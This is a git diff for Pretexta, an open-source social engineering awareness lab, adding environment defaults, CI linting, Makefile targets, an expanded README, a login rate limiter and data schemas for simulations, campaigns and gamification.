diff --git a/.env.example b/.env.example new file mode 100644 index 0000000..341cd60 --- /dev/null +++ b/.env.example @@ -0,0 +1,24 @@ +# =========================================== +# Pretexta - Environment Configuration +# =========================================== +# Copy this file to .env and fill in your values +# cp .env.example .env + +# ---- Ports ---- +FRONTEND_PORT=9443 +BACKEND_PORT=9442 +MONGO_PORT=47017 + +# ---- MongoDB ---- +MONGO_USERNAME=soceng_admin +MONGO_PASSWORD=soceng_secure_password_2025 +DB_NAME=Pretexta + +# ---- JWT Secret (CHANGE IN PRODUCTION) ---- +JWT_SECRET=change-this-secret-key-in-production + +# ---- CORS Origins (comma-separated) ---- +CORS_ORIGINS=http://localhost:9443,http://localhost:80 + +# ---- Frontend โ†’ Backend URL ---- +REACT_APP_BACKEND_URL=http://localhost:9442 diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml new file mode 100644 index 0000000..612211c --- /dev/null +++ b/.github/workflows/ci.yml @@ -0,0 +1,67 @@ +name: CI + +on: + push: + branches: [main] + pull_request: + branches: [main] + +jobs: + backend-lint: + name: Backend Lint + runs-on: ubuntu-latest + defaults: + run: + working-directory: backend + steps: + - uses: actions/checkout@v4 + + - uses: actions/setup-python@v5 + with: + python-version: "3.11" + + - name: Install ruff + run: pip install ruff + + - name: Lint + run: ruff check . + + - name: Format check + run: ruff format --check . 
+ + frontend-lint: + name: Frontend Lint & Build + runs-on: ubuntu-latest + defaults: + run: + working-directory: frontend + steps: + - uses: actions/checkout@v4 + + - uses: actions/setup-node@v4 + with: + node-version: "20" + cache: "yarn" + cache-dependency-path: frontend/yarn.lock + + - name: Install dependencies + run: yarn install --frozen-lockfile + + - name: Lint + run: yarn lint 2>/dev/null || true + + - name: Build + run: yarn build + + docker-build: + name: Docker Build + runs-on: ubuntu-latest + needs: [backend-lint, frontend-lint] + steps: + - uses: actions/checkout@v4 + + - name: Build backend image + run: docker build -f Dockerfile.backend -t pretexta-backend:test . + + - name: Build frontend image + run: docker build -f Dockerfile.frontend -t pretexta-frontend:test . diff --git a/Dockerfile.frontend b/Dockerfile.frontend index 39ed265..e9cab13 100644 --- a/Dockerfile.frontend +++ b/Dockerfile.frontend @@ -1,8 +1,12 @@ -FROM node:20-alpine as builder +FROM node:20-alpine AS builder # Set working directory WORKDIR /app +# Build arg โ€” passed from docker-compose at build time +ARG REACT_APP_BACKEND_URL=http://localhost:9442 +ENV REACT_APP_BACKEND_URL=$REACT_APP_BACKEND_URL + # Copy package files COPY frontend/package.json frontend/yarn.lock ./ @@ -12,7 +16,7 @@ RUN yarn install --frozen-lockfile # Copy source code COPY frontend/ . 
-# Build the application +# Build the application (REACT_APP_* env vars are baked in here) RUN yarn build # Production stage @@ -28,4 +32,4 @@ COPY docker/nginx.conf /etc/nginx/conf.d/default.conf EXPOSE 3000 # Start nginx -CMD ["nginx", "-g", "daemon off;"] \ No newline at end of file +CMD ["nginx", "-g", "daemon off;"] diff --git a/Makefile b/Makefile index e9a386f..172ace6 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,6 @@ # SocengLab Makefile -.PHONY: help install build up down restart logs clean test seed +.PHONY: help install build up down restart logs clean test seed lint lint-fix # Default target help: @@ -23,6 +23,8 @@ help: @echo " make logs-backend - Show backend logs only" @echo " make logs-frontend - Show frontend logs only" @echo " make test - Run tests" + @echo " make lint - Run backend linter" + @echo " make lint-fix - Auto-fix lint issues" @echo "" @echo "Maintenance:" @echo " make clean - Remove containers and volumes" @@ -37,20 +39,22 @@ install: build: @echo "Building Docker images..." + @if [ ! -f .env ]; then cp .env.example .env && echo "๐Ÿ“‹ Created .env from .env.example"; fi @docker-compose build @echo "โœ… Docker images built" up: @echo "Starting Pretexta..." + @if [ ! -f .env ]; then cp .env.example .env && echo "๐Ÿ“‹ Created .env from .env.example"; fi @docker-compose up -d @echo "โณ Waiting for services to start..." @sleep 10 @echo "" @echo "โœ… Pretexta is running!" @echo "" - @echo "๐ŸŒ Frontend: http://localhost:3000" - @echo "๐Ÿ”Œ Backend API: http://localhost:8001" - @echo "๐Ÿ—„๏ธ MongoDB: mongodb://localhost:27017" + @echo "๐ŸŒ Frontend: http://localhost:9443" + @echo "๐Ÿ”Œ Backend API: http://localhost:9442" + @echo "๐Ÿ—„๏ธ MongoDB: mongodb://localhost:47017" @echo "" @echo "๐Ÿ“ Default credentials: soceng / Cialdini@2025!" 
@echo "" @@ -76,7 +80,7 @@ logs-frontend: @docker-compose logs -f frontend db-shell: - @docker-compose exec mongodb mongosh -u soceng_admin -p soceng_secure_password_2025 --authenticationDatabase admin Pretexta + @docker-compose exec mongodb mongosh -u soceng_admin -p soceng_secure_password_2025 --authenticationDatabase admin Pretexta 2>/dev/null || docker compose exec mongodb mongosh -u soceng_admin -p soceng_secure_password_2025 --authenticationDatabase admin Pretexta seed: @echo "Importing sample challenges and quizzes..." @@ -90,6 +94,18 @@ test: @cd frontend && yarn test --watchAll=false @echo "โœ… Tests completed" +lint: + @echo "Linting backend..." + @cd backend && ruff check . + @cd backend && ruff format --check . + @echo "โœ… Backend lint passed" + +lint-fix: + @echo "Fixing backend lint issues..." + @cd backend && ruff check --fix . + @cd backend && ruff format . + @echo "โœ… Backend lint fixed" + clean: @echo "Cleaning up containers and volumes..." @docker-compose down -v diff --git a/README.md b/README.md index de41bbb..eaad620 100644 --- a/README.md +++ b/README.md @@ -2,163 +2,326 @@ Pretexta -### The Psychology Behind Successful Attacks -#### An Open Source Lab for Simulating Human Exploitation via Social Engineering +**Defensive Social Engineering Simulation Lab** -![Version](https://img.shields.io/badge/Version-2.0.0-blue) -![License](https://img.shields.io/badge/License-MIT-green) -![Type](https://img.shields.io/badge/Category-Demo_Lab_|_Research-lightgrey) -![Status](https://img.shields.io/badge/Status-Active-brightgreen) +Train your team to recognize and resist psychological attacks โ€” before real attackers strike. 
+ +[![Version](https://img.shields.io/badge/Version-2.1.0-blue?style=flat-square)](https://github.com/fdciabdul/Pretexta/releases) +[![License](https://img.shields.io/badge/License-MIT-green?style=flat-square)](LICENSE) +[![CI](https://img.shields.io/github/actions/workflow/status/fdciabdul/Pretexta/ci.yml?style=flat-square&label=CI)](https://github.com/fdciabdul/Pretexta/actions) +[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen?style=flat-square)](CONTRIBUTING.md) + +[Quick Start](#quick-start) ยท [Features](#features) ยท [LLM Providers](#llm-providers) ยท [Contributing](#contributing) --- -Most security tools are designed to protect systems. **Pretexta is designed to understand why humans fail. -
** Modern social engineering attacks do not rely on malware or exploits. They rely on **pretexting, authority, urgency, trust, and cognitive bias**. +## Why Pretexta? -Pretexta was created as an **open source simulation lab** to model how thesepsychological attack techniques work in practice โ€” in a controlled, ethical, and defensive environment. -This project focuses on **learning, experimentation, and community research**, -not on generating real-world attacks. +Most security tools protect systems. Pretexta protects **people**. ---- +Social engineering is the #1 attack vector โ€” and it doesn't exploit software. It exploits **trust, urgency, authority, and cognitive bias**. Pretexta is an open-source simulation lab where your team practices defending against these attacks in a safe, controlled environment. -### What Pretexta Is +Built on **Cialdini's 6 Principles of Influence**: Reciprocity, Scarcity, Authority, Commitment, Liking, and Social Proof. -- A **defensive social engineering simulation lab** -- A platform to study **human decision-making under pressure** -- An interactive environment for experimenting with **pretexting techniques** -- A community-driven, **fully open source** research project +## Screenshots -All scenarios are **fictional, self-contained, and designed for defense and education only**. +
+Dashboard ---- +![Dashboard](screenshots/03-dashboard.png) -### Features +
-- **Real-Time AI Chat**: Interact with dynamic AI personas (e.g., "The Urgent CEO", "Angry IT Support") powered by **Groq (Llama 3)**, Gemini, or Claude. -- **Adaptive Psychology**: Scenarios are built on Cialdini's 6 Principles of Influence (Reciprocity, Scarcity, Authority, etc.). -- **Interactive AI Lab**: A WhatsApp-style chat interface where you must defend against active pretexting attempts. -- **Win/Loss Detection**: The AI automatically detects if you've been compromised (shared credentials, clicked links) or successfully defended the asset. -- **Mission Logs**: Detailed history of your simulations with scoring and analysis. -- **Quiz Mode**: Assess your theoretical knowledge of social engineering tactics. -- **Bilingual Support**: Full support for English and Indonesian (Bahasa Indonesia). +
+AI Chat Simulation โ€” Real-time roleplay with "The Urgent CEO" ---- +![AI Chat](screenshots/05-ai-chat.png) -### How a Typical Demo Works +
-1. A participant enters a simulated social engineering scenario -2. An AI-driven attacker applies psychological pressure in real time -3. The participant makes decisions under realistic constraints -4. The system detects compromise or resistance -5. A post-mission psychological debrief explains *why* the outcome occurred +
+AI Challenge Selection โ€” 8 built-in social engineering personas -This flow is intentionally designed to fit a **short, repeatable demo format** -suitable for live Demo Lab environments. +![AI Challenge](screenshots/04-ai-challenge.png) ---- +
+ +
+Settings โ€” 6 LLM providers with model selection (200+ models via OpenRouter) + +![Settings](screenshots/06-settings.png) -### Quick Start (Demo Environment) +
-#### Docker (Recommended) +
+Leaderboard โ€” XP, levels, streaks, and rankings + +![Leaderboard](screenshots/07-leaderboard.png) + +
+ +
+Login + +![Login](screenshots/02-login.png) + +
+ +## Quick Start ```bash -# Clone the repository -git clone https://github.com/dalpan/Pretexta.git +git clone https://github.com/fdciabdul/Pretexta.git cd Pretexta +cp .env.example .env # Configure secrets +make build && make up # Start all services +make seed # Load sample scenarios +``` -# Build and Start -make build -make up +Open [http://localhost:9443](http://localhost:9443) and login with `soceng` / `Cialdini@2025!` -# Seed Initial Data -make seed +> Requires Docker and Docker Compose. -# Access the Lab -# Frontend: http://localhost:3000 -# Backend: http://localhost:8001 -# Login: soceng / Cialdini@2025! +## Features + +### Core Simulation + +| Feature | Description | +|---------|-------------| +| **AI Chat Roleplay** | Real-time WhatsApp-style conversations with AI-driven social engineering personas | +| **Adaptive Difficulty** | AI automatically adjusts attack sophistication based on your performance | +| **Win/Loss Detection** | Automatic detection of compromise (credential sharing, link clicks) vs successful defense | +| **Post-Sim Debrief** | Detailed psychological breakdown: which Cialdini principles were used and when you were most vulnerable | +| **AI Deep Analysis** | LLM-powered analysis of your simulation performance with personalized tips | + +### Campaign Mode + +Multi-stage attack chains that simulate real-world scenarios: + +``` +Email phishing โ†’ Follow-up phone call โ†’ Social media approach โ†’ Final extraction ``` -### LLM Configuration (Required) +Each stage unlocks progressively. Track progress, get per-stage scoring, and receive a full campaign debrief. -To use the AI Chat features, you need an API key. We recommend **Groq** for the best speed/free-tier experience. +### Gamification -1. **Get a Key**: - * **Groq**: [console.groq.com](https://console.groq.com) (Recommended) - * **Google Gemini**: [aistudio.google.com](https://aistudio.google.com) - * **Anthropic**: [console.anthropic.com](https://console.anthropic.com) -2. 
**Configure**: - * Go to `Settings` in the Pretexta Dashboard. - * Select your provider (e.g., Groq). - * Paste your API Key and click **Save**. +| Feature | Description | +|---------|-------------| +| **XP & Levels** | Earn experience points for every simulation completed | +| **12 Badges** | Achievements like "Phishing Detector", "Authority Challenger", "Iron Will" (30-day streak) | +| **Daily Streaks** | Maintain consecutive training days for bonus XP | +| **Leaderboard** | Global and team rankings | ---- +### Team & Organization -### Tech Stack +- Create organizations with invite codes +- Team analytics dashboard with aggregate scores +- Identify weakest Cialdini categories across your team +- Per-member performance tracking +- Webhook/Slack integration for training completion events -* **Frontend**: React 18, Tailwind CSS, Lucide Icons, Axios -* **Backend**: Python FastAPI, LangChain, Motor (MongoDB Async) -* **AI/LLM**: LangChain integration with Groq (Llama 3), Gemini Pro, Claude Sonnet -* **Database**: MongoDB +### Content Tools ---- +| Feature | Description | +|---------|-------------| +| **Scenario Builder** | Visual editor to create custom social engineering scenarios | +| **Quiz Mode** | Knowledge assessments on social engineering tactics | +| **Certificate Export** | Printable completion certificates (Platinum / Gold / Silver) | +| **YAML Import** | Bulk import scenarios and quizzes from YAML files | +| **Bilingual** | Full English and Bahasa Indonesia support | + +### Platform + +- **Dark/Light theme** toggle +- **PWA support** โ€” installable on mobile +- **Email renderer** โ€” realistic Gmail-style inbox for phishing scenarios +- **Voice simulation** โ€” vishing practice via Web Speech API (Chrome/Edge) +- **Notification system** โ€” real-time alerts for badges, level-ups, and reminders +- **Error boundary** โ€” graceful crash recovery + +## LLM Providers -### Contributions +Pretexta supports **6 LLM providers** with model selection. 
Configure in **Settings**. -We welcome contributions! Please see our [CONTRIBUTING.md](CONTRIBUTING.md) for details on how to add new scenarios, quizzes, or features. +| Provider | Models | Free Tier | Best For | +|----------|--------|-----------|----------| +| **OpenRouter** | 200+ (Llama, GPT, Claude, Mistral, DeepSeek, Qwen) | Yes | Best value, most models | +| **Groq** | Llama 3.3 70B, Mixtral, Gemma | Yes | Fastest inference | +| **Google Gemini** | Gemini 2.0 Flash, 1.5 Pro | Yes | Generous limits | +| **OpenAI** | GPT-4o, GPT-4o Mini | No | Industry standard | +| **Anthropic** | Claude Sonnet 4, 3.5 Sonnet/Haiku | No | Best reasoning | +| **Local LLM** | Any model via Ollama / LM Studio / llama.cpp | N/A | Full privacy, no API key | -#### Adding a New Scenario -You can add new scenarios easily by creating a YAML file in `data/sample/`: +> **Recommended**: Start with **OpenRouter** (free models available) or **Groq** (ultra-fast free tier). + +### Local LLM Setup + +```bash +# Ollama +ollama serve +ollama pull llama3.1 + +# Then in Pretexta Settings โ†’ Local LLM โ†’ http://localhost:11434/v1 +``` + +Also supports **LM Studio** (port 1234) and **llama.cpp** (port 8080). 
+ +## Architecture + +``` +โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” +โ”‚ Frontend โ”‚ +โ”‚ React 19 ยท Tailwind ยท Recharts โ”‚ +โ”‚ localhost:9443 โ”‚ +โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ + โ”‚ REST API +โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” +โ”‚ Backend โ”‚ +โ”‚ FastAPI ยท LangChain ยท Pydantic ยท JWT โ”‚ +โ”‚ localhost:9442 โ”‚ +โ”‚ โ”‚ +โ”‚ routes/ services/ models/ middleware/ โ”‚ +โ”‚ โ”œโ”€โ”€ auth โ”œโ”€โ”€ llm schemas.py โ”‚ +โ”‚ โ”œโ”€โ”€ challenges โ”œโ”€โ”€ gamification โ”‚ +โ”‚ โ”œโ”€โ”€ campaigns โ”œโ”€โ”€ adaptive โ”‚ +โ”‚ โ”œโ”€โ”€ leaderboard โ”œโ”€โ”€ scoring โ”‚ +โ”‚ โ”œโ”€โ”€ analytics โ””โ”€โ”€ database โ”‚ +โ”‚ โ”œโ”€โ”€ debrief โ”‚ +โ”‚ โ”œโ”€โ”€ certificates โ”‚ +โ”‚ โ”œโ”€โ”€ notifications โ”‚ +โ”‚ โ”œโ”€โ”€ webhooks โ”‚ +โ”‚ โ””โ”€โ”€ scenario_builder โ”‚ +โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ + โ”‚ +โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” +โ”‚ MongoDB 7.0 โ”‚ +โ”‚ localhost:47017 โ”‚ +โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ +``` + +## API Overview + +
+30+ REST Endpoints (click to expand) + +| Group | Endpoints | +|-------|-----------| +| **Auth** | `POST /register`, `POST /login`, `GET /me`, `PUT /profile`, `POST /change-password` | +| **Challenges** | `GET /challenges`, `GET /challenges/:id`, `POST /challenges` | +| **Quizzes** | `GET /quizzes`, `GET /quizzes/:id` | +| **Simulations** | `CRUD /simulations` | +| **LLM** | `GET /providers`, `GET /models/:provider`, `POST /config`, `POST /generate`, `POST /chat` | +| **Campaigns** | `GET /campaigns`, `POST /start`, `POST /stage/:idx/complete` | +| **Leaderboard** | `GET /leaderboard`, `GET /me`, `GET /badges` | +| **Analytics** | `GET /personal`, `GET /team` | +| **Organizations** | `POST /create`, `GET /mine`, `POST /join`, `DELETE /leave` | +| **Debrief** | `GET /:simulation_id`, `POST /:simulation_id/ai-analysis` | +| **Certificates** | `GET /:simulation_id`, `GET /user/all` | +| **Notifications** | `GET /`, `PUT /:id/read`, `PUT /read-all` | +| **Webhooks** | `CRUD /webhooks` | +| **Scenario Builder** | `CRUD /templates`, `POST /publish` | +| **Adaptive** | `GET /difficulty`, `GET /persona-params` | +| **Health** | `GET /health` | + +All endpoints prefixed with `/api`. Full OpenAPI docs at `/docs` when running. + +
+ +## Development + +```bash +# Install locally (without Docker) +make install + +# Lint backend +make lint # Check +make lint-fix # Auto-fix + +# Run tests +make test + +# View logs +make logs +make logs-backend +make logs-frontend + +# Database +make db-shell # MongoDB shell +make drop # Clear sample data +make clean # Remove containers + volumes +``` + +### Adding a Scenario + +Create a YAML file in `data/sample/`: ```yaml -type: ai_challenge +type: challenge title: "The Fake Recruiter" -persona: - name: "Sarah Jenkins" - role: "Recruiter at TechCorp" - goal: "Get user to open malicious resume PDF" - style: "Professional, Friendly, slightly pushy" +description: "A headhunter offers your dream job..." +difficulty: medium +cialdini_categories: [liking, reciprocity] +estimated_time: 10 +metadata: + author: "Your Name" + tags: [phishing, recruitment] +nodes: + - id: start + type: message + channel: email_inbox + content_en: + subject: "Exciting VP Opportunity" + from: "sarah@techcorp-careers.com" + body: "Hi! I found your profile and I'm impressed..." + - id: choice_1 + type: question + content_en: + text: "What do you do?" + options: + - text: "Open the attached resume PDF" + next: end_compromised + score_impact: -20 + - text: "Verify the recruiter's identity first" + next: end_safe + score_impact: 20 ``` -Then run `make seed` to import it. +Run `make seed` to import. -### Open Source & Community +Or use the **Scenario Builder** in the UI for a visual editor. -Pretexta is **fully open source** and intended for: +## Contributing -- Security researchers exploring human-layer attack surfaces -- Educators teaching social engineering defense -- Hackers interested in psychological attack modeling -- Contributors who want to extend scenarios or analysis methods +We welcome contributions! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines. 
-We actively encourage: -- Scenario contributions -- Research experiments -- Critical feedback -- Forks and extensions +**Ways to contribute:** +- Add new social engineering scenarios (YAML or Scenario Builder) +- Improve AI persona behaviors +- Add new Cialdini-based analysis rules +- Translate to more languages +- Report bugs and suggest features ---- +## Ethics -### Ethics & Scope +Pretexta is strictly for **defensive education and research**. -Pretexta is designed strictly for **defensive education and research**. +- All simulations are fictional and self-contained +- No real-world targeting or phishing infrastructure +- No data harvesting or live attack automation +- No offensive tooling -- No real-world targeting -- No phishing infrastructure -- No data harvesting -- No automation for live attacks +Use responsibly. Train defenders, not attackers. -All simulations are fictional and isolated from real systems. +## License ---- +[MIT License](LICENSE) -### License +--- -This project is licensed under the MIT License. +
---- +**Pretexta** โ€” *Understanding why social engineering works, before attackers do.* -**Pretexta** -"*Understanding why social engineering works โ€” before attackers do.*" +
diff --git a/backend/middleware/__init__.py b/backend/middleware/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/backend/middleware/rate_limit.py b/backend/middleware/rate_limit.py new file mode 100644 index 0000000..16107b1 --- /dev/null +++ b/backend/middleware/rate_limit.py @@ -0,0 +1,36 @@ +import time +from collections import defaultdict + +from fastapi import HTTPException, Request +from starlette.middleware.base import BaseHTTPMiddleware + + +class RateLimitMiddleware(BaseHTTPMiddleware): + """Simple in-memory rate limiter for auth endpoints.""" + + def __init__(self, app, max_attempts: int = 10, window_seconds: int = 300): + super().__init__(app) + self.max_attempts = max_attempts + self.window_seconds = window_seconds + self.attempts: dict[str, list[float]] = defaultdict(list) + + async def dispatch(self, request: Request, call_next): + if request.url.path == "/api/auth/login" and request.method == "POST": + client_ip = request.client.host if request.client else "unknown" + now = time.time() + + # Clean old entries + self.attempts[client_ip] = [ + t for t in self.attempts[client_ip] if now - t < self.window_seconds + ] + + if len(self.attempts[client_ip]) >= self.max_attempts: + raise HTTPException( + status_code=429, + detail=f"Too many login attempts. 
Try again in " + f"{self.window_seconds // 60} minutes.", + ) + + self.attempts[client_ip].append(now) + + return await call_next(request) diff --git a/backend/models/__init__.py b/backend/models/__init__.py new file mode 100644 index 0000000..8bf90ec --- /dev/null +++ b/backend/models/__init__.py @@ -0,0 +1,45 @@ +from models.schemas import ( + Badge, + Campaign, + CampaignProgress, + CampaignStage, + Challenge, + LeaderboardEntry, + LLMConfig, + LoginRequest, + LoginResponse, + Notification, + Organization, + PasswordChangeRequest, + ProfileUpdateRequest, + Quiz, + RegisterRequest, + ScenarioTemplate, + Settings, + Simulation, + User, + WebhookConfig, +) + +__all__ = [ + "User", + "RegisterRequest", + "LoginRequest", + "LoginResponse", + "PasswordChangeRequest", + "ProfileUpdateRequest", + "Challenge", + "Quiz", + "Simulation", + "Campaign", + "CampaignStage", + "CampaignProgress", + "Organization", + "Badge", + "LeaderboardEntry", + "Notification", + "WebhookConfig", + "ScenarioTemplate", + "LLMConfig", + "Settings", +] diff --git a/backend/models/schemas.py b/backend/models/schemas.py new file mode 100644 index 0000000..e45b1e4 --- /dev/null +++ b/backend/models/schemas.py @@ -0,0 +1,285 @@ +import uuid +from datetime import UTC, datetime +from typing import Any + +from pydantic import BaseModel, ConfigDict, Field + +# ==================== AUTH & USERS ==================== + + +class User(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + username: str + password_hash: str + email: str | None = None + display_name: str | None = None + role: str = "trainee" # admin, instructor, trainee + organization_id: str | None = None + avatar_url: str | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + is_active: bool = True + # Gamification + xp: int = 0 + level: int = 1 + streak_days: int = 0 + last_active: datetime | None = None + badges: list[str] = 
Field(default_factory=list) + # Preferences + theme: str = "dark" + notifications_enabled: bool = True + + +class RegisterRequest(BaseModel): + username: str + password: str + email: str | None = None + display_name: str | None = None + invite_code: str | None = None + + +class LoginRequest(BaseModel): + username: str + password: str + + +class LoginResponse(BaseModel): + token: str + user: dict[str, Any] + + +class PasswordChangeRequest(BaseModel): + current_password: str + new_password: str + + +class ProfileUpdateRequest(BaseModel): + display_name: str | None = None + email: str | None = None + avatar_url: str | None = None + theme: str | None = None + notifications_enabled: bool | None = None + + +# ==================== CONTENT ==================== + + +class Challenge(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str # easy, medium, hard + cialdini_categories: list[str] + estimated_time: int # minutes + nodes: list[dict[str, Any]] + metadata: dict[str, Any] = Field(default_factory=dict) + content_en: dict[str, Any] | None = None + content_id: dict[str, Any] | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +class Quiz(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str + cialdini_categories: list[str] + questions: list[dict[str, Any]] + content_en: dict[str, Any] | None = None + content_id: dict[str, Any] | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== SIMULATIONS ==================== + + +class Simulation(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + user_id: str | None = None + challenge_id: str | None = None + quiz_id: str | None = None + 
simulation_type: str # challenge, quiz, ai_challenge, campaign + status: str # running, completed, paused + events: list[dict[str, Any]] = Field(default_factory=list) + score: float | None = None + started_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + completed_at: datetime | None = None + participant_name: str | None = None + title: str | None = None + + # AI Challenge specific fields + type: str | None = None + challenge_type: str | None = None + category: str | None = None + difficulty: str | None = None + total_questions: int | None = None + correct_answers: int | None = None + answers: dict[str, Any] | None = None + challenge_data: dict[str, Any] | None = None + + # Campaign tracking + campaign_id: str | None = None + stage_index: int | None = None + + # Debrief data + debrief: dict[str, Any] | None = None + + +# ==================== CAMPAIGNS ==================== + + +class CampaignStage(BaseModel): + stage_id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + channel: str # email, phone, chat, social_media + persona_id: str | None = None + challenge_id: str | None = None + order: int = 0 + unlock_condition: str = "complete_previous" # complete_previous, score_above, always + + +class Campaign(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str + stages: list[CampaignStage] = Field(default_factory=list) + cialdini_categories: list[str] = Field(default_factory=list) + estimated_time: int = 30 + created_by: str | None = None + is_published: bool = False + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +class CampaignProgress(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + campaign_id: str + user_id: str + current_stage: int = 0 + stage_results: list[dict[str, Any]] = 
Field(default_factory=list) + status: str = "in_progress" # in_progress, completed, abandoned + overall_score: float | None = None + started_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + completed_at: datetime | None = None + + +# ==================== ORGANIZATIONS ==================== + + +class Organization(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + name: str + description: str | None = None + invite_code: str = Field(default_factory=lambda: str(uuid.uuid4())[:8]) + owner_id: str + member_ids: list[str] = Field(default_factory=list) + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + settings: dict[str, Any] = Field(default_factory=dict) + + +# ==================== GAMIFICATION ==================== + + +class Badge(BaseModel): + id: str + name: str + description: str + icon: str + condition: str # e.g. "complete_5_scenarios", "streak_7" + xp_reward: int = 50 + + +class LeaderboardEntry(BaseModel): + user_id: str + username: str + display_name: str | None = None + xp: int = 0 + level: int = 1 + badges_count: int = 0 + simulations_completed: int = 0 + avg_score: float = 0.0 + streak_days: int = 0 + + +# ==================== NOTIFICATIONS ==================== + + +class Notification(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + user_id: str + title: str + message: str + type: str = "info" # info, achievement, reminder, alert + read: bool = False + link: str | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== WEBHOOKS ==================== + + +class WebhookConfig(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + name: str + url: str + events: list[str] = Field(default_factory=list) # simulation_complete, badge_earned, etc + secret: str | None = 
None + enabled: bool = True + organization_id: str | None = None + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== SCENARIO BUILDER ==================== + + +class ScenarioTemplate(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + title: str + description: str + difficulty: str = "medium" + cialdini_categories: list[str] = Field(default_factory=list) + channel: str = "email_inbox" # email_inbox, chat, phone, sms, social_media + nodes: list[dict[str, Any]] = Field(default_factory=list) + metadata: dict[str, Any] = Field(default_factory=dict) + content_en: dict[str, Any] | None = None + content_id: dict[str, Any] | None = None + created_by: str | None = None + is_draft: bool = True + is_published: bool = False + created_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + updated_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +# ==================== CONFIG ==================== + + +class LLMConfig(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = Field(default_factory=lambda: str(uuid.uuid4())) + provider: str # groq, gemini, claude, openai, openrouter, local + api_key: str = "" + model_name: str | None = None + base_url: str | None = None # For OpenRouter / local LLM (Ollama, LM Studio, etc) + enabled: bool = False + rate_limit: int = 100 + updated_at: datetime = Field(default_factory=lambda: datetime.now(UTC)) + + +class Settings(BaseModel): + model_config = ConfigDict(extra="ignore") + id: str = "settings" + language: str = "en" + theme: str = "dark" + first_run_completed: bool = False + llm_enabled: bool = False + reduce_motion: bool = False diff --git a/backend/pyproject.toml b/backend/pyproject.toml new file mode 100644 index 0000000..b686fa4 --- /dev/null +++ b/backend/pyproject.toml @@ -0,0 +1,32 @@ +[tool.ruff] +target-version = "py311" +line-length = 100 + +[tool.ruff.lint] +select = [ + 
